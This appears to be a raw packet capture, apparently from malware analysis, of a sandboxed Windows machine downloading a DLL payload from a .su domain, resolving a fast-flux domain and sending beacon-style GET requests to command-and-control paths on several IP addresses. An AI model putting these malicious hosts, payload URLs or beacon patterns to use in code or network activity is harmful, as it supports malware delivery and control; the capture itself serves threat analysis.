E..(.U@….4….%……P.S..45..P…&m……..
2014-08-15 09:14:05.665104 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [P.], seq 1:222, ack 1, win 64240, length 221: HTTP: GET /mod_jshoppi-authssd5/soft64.dll HTTP/1.1
E….V@….V….%……P.S..45..P….
..GET /mod_jshoppi-authssd5/soft64.dll HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:14:05.665109 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [.], ack 222, win 64240, length 0
E..(HX…..1%……..P..45…S..P…%………
2014-08-15 09:14:05.920418 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [P.], seq 1:1368, ack 222, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…J……’%……..P..45…S..P….s..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:35 GMT
Content-Type: application/octet-stream
Content-Length: 175108
Last-Modified: Fri, 15 Aug 2014 08:50:44 GMT
Connection: close
ETag: “53edc9e4-2ac04″
Accept-Ranges: bytes

.o8b,..o.#…f…f99.H..5
…1[……u.P|.*…… .$..q…. .).Z..Pq.}..2.aX0s.f.[…..j..”,.k. 6…….G/*..!.x…7|…7..B….%p…3_P…..zhh/..OWe..Q.>.u…….. 70.+.9.2..G……..E..P.c..’…..!……U.~…(..m…_………/(…xF……s..iV.1.pq!U…Y.f.x|…..e..>=4..xK..[…….,.=.+*~d6..}.W.{:.gL?6#..NlL .}.j……AS.!.{2V..0..6./….].Z.Y.P.m…F…c…..|y.N@&….k..j.t…]6.Z………..p…FD1….\~..[V…f…..9i.}^….v.g..5J…^.V..:…….(.[…….H….@::..1LD …@>…..f….A.|.O.Q….LP..F?.)..q..D….Go3.2n.6….h….w……….L|ibu……..’…>…0JS..(…….l…HB…x…\1.F…U.$=p,..o@.t_…o.)…<S….g.& fF.X.0..\……..&I..J.h.C”.
=.DM……….j./…].Ih.7…7..\i..%..*3.+. .V6…p……’…E.q…7.
.OB… ..<……..@….m…u.4..N!7..i……e..[.d.{…….06…r…..A&~…^.mq.B…/N..9b,…9..}….s..s…..\>…Q.%……M…,…….N.A…=.q..c…$..+.. ..+s.Gt.l..w+……3.W.’P%R}Z. t..@~………..n..x.V..u.K.4.?……..r…Z.Z…>.g…^”%. …k..e…$………………..q…..C……..kJ…L…..&#.D k.;.;…._D.c!w;e….I..bFB,oOCP.DB.m….(..hJ.6..JM.7.)…Q.. .+
2014-08-15 09:14:06.020081 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [P.], seq 1:1368, ack 222, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…J……M%……..P..45…S..P….s..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:35 GMT
Content-Type: application/octet-stream
Content-Length: 175108
Last-Modified: Fri, 15 Aug 2014 08:50:44 GMT
Connection: close
ETag: “53edc9e4-2ac04”
Accept-Ranges: bytes

2014-08-15 09:14:13.292765 IP 172.16.204.128.59897 > 172.16.204.2.53: 61172+ A? triple-bow.su. (31)
E..;……I9………..5.’.x…………
triple-bow.su…..
2014-08-15 09:14:14.298401 IP 172.16.204.128.59897 > 172.16.204.2.53: 61172+ A? triple-bow.su. (31)
E..;……I7………..5.’.x…………
triple-bow.su…..
2014-08-15 09:14:14.915431 IP 172.16.204.2.53 > 172.16.204.128.59897: 61172 12/0/0 A 134.249.11.2, A 141.101.28.223, A 176.111.252.50, A 46.151.243.56, A 178.204.32.63, A 176.117.78.213, A 85.198.174.37, A 67.8.236.182, A 178.74.212.207, A 119.18.74.66, A 178.137.18.149, A 37.115.14.69 (223)
E……….e………5………………
triple-bow.su…………………………….e……………o.2……………8………….. ?………….uN………….U..%…………C…………….J…………..w.JB……………………….%s.E
2014-08-15 09:14:14.921205 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [S], seq 1365434509, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….[………..PQb…….. .R<…………..
2014-08-15 09:14:14.923071 IP 172.16.204.128.49160 > 134.249.11.2.80: Flags [S], seq 44314422, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….Z………..P../6…… .RQ…………..
2014-08-15 09:14:15.114950 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [S.], seq 2115704189, ack 1365434510, win 64240, options [mss 1460], length 0
E..,……………..P..~..}Qb..`………….
2014-08-15 09:14:15.115089 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [.], ack 1, win 64240, length 0
E..(..@….b………..PQb..~..~P…$u……..
2014-08-15 09:14:15.115380 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [P.], seq 1:335, ack 1, win 64240, length 334: HTTP: GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
E..v..@…………….PQb..~..~P…….GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: triple-bow.su
Connection: Keep-Alive
2014-08-15 09:14:15.115439 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [.], ack 335, win 64240, length 0
E..(……………..P..~..~Qb..P…#’……..
2014-08-15 09:14:15.131947 IP 134.249.11.2.80 > 172.16.204.128.49160: Flags [S.], seq 934879185, ack 44314423, win 64240, options [mss 1460], length 0
E..,……………..P..7…../7`…H………
2014-08-15 09:14:15.132078 IP 172.16.204.128.49160 > 134.249.11.2.80: Flags [.], ack 1, win 64240, length 0
E..(..@….`………..P../77…P…`………
2014-08-15 09:14:15.239847 IP 172.16.204.2.53 > 172.16.204.128.59897: 61172 12/0/0 A 141.101.28.223, A 176.111.252.50, A 46.151.243.56, A 178.204.32.63, A 176.117.78.213, A 85.198.174.37, A 67.8.236.182, A 178.74.212.207, A 119.18.74.66, A 178.137.18.149, A 37.115.14.69, A 134.249.11.2 (223)
E….w……………5………………
triple-bow.su………………e……………o.2……………8………….. ?………….uN………….U..%…………C…………….J…………..w.JB……………………….%s.E…………….
2014-08-15 09:14:15.462714 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [FP.], seq 1:179, ack 335, win 64240, length 178: HTTP: HTTP/1.1 200 OK
E………………..P..~..~Qb..P…R…HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:14:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 29
Connection: close

<html><body>hi!</body></html>

2014-08-15 09:15:27.993338 IP 172.16.204.128.49169 > 195.114.145.69.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /b/letr/493189686B4811B4DE99E325 HTTP/1.1
E…..@…*……r.E…P~.q6K$[.P….n..GET /b/letr/493189686B4811B4DE99E325 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: triple-bow.su
Cache-Control: no-cache
2014-08-15 09:15:27.993353 IP 195.114.145.69.80 > 172.16.204.128.49169: Flags [.], ack 218, win 64240, length 0
E..(……n..r.E…..P..K$[.~.r.P………….
2014-08-15 09:15:28.270522 IP 195.114.145.69.80 > 172.16.204.128.49169: Flags [P.], seq 1:1236, ack 218, win 64240, length 1235: HTTP: HTTP/1.1 200 OK
E….0….g..r.E…..P..K$[.~.r.P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:28 GMT
Content-Type: application/octet-stream
Content-Length: 1083
Connection: close

2014-08-15 09:15:29.210604 IP 172.16.204.128.49171 > 31.192.209.57.8080: Flags [P.], seq 1:223, ack 1, win 64240, length 222: HTTP: GET /b/letr/AC82485B52C6EB38E71719A9 HTTP/1.1
E….
@….]…….9….3;7g{.g.P…l…GET /b/letr/AC82485B52C6EB38E71719A9 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: 31.192.209.57:8080
Cache-Control: no-cache
2014-08-15 09:15:29.210638 IP 31.192.209.57.8080 > 172.16.204.128.49171: Flags [.], ack 223, win 64240, length 0
E..(…….k…9……..{.g.3;8EP….M……..
2014-08-15 09:15:29.521750 IP 31.192.209.57.8080 > 172.16.204.128.49171: Flags [P.], seq 1:1242, ack 223, win 64240, length 1241: HTTP: HTTP/1.1 200 OK
E….f………9……..{.g.3;8EP…….HTTP/1.1 200 OK
Server: nginx/1.2.2
Date: Fri, 15 Aug 2014 14:19:07 GMT
Content-Type: application/octet-stream
Content-Length: 1083
Connection: closezemot

Share Button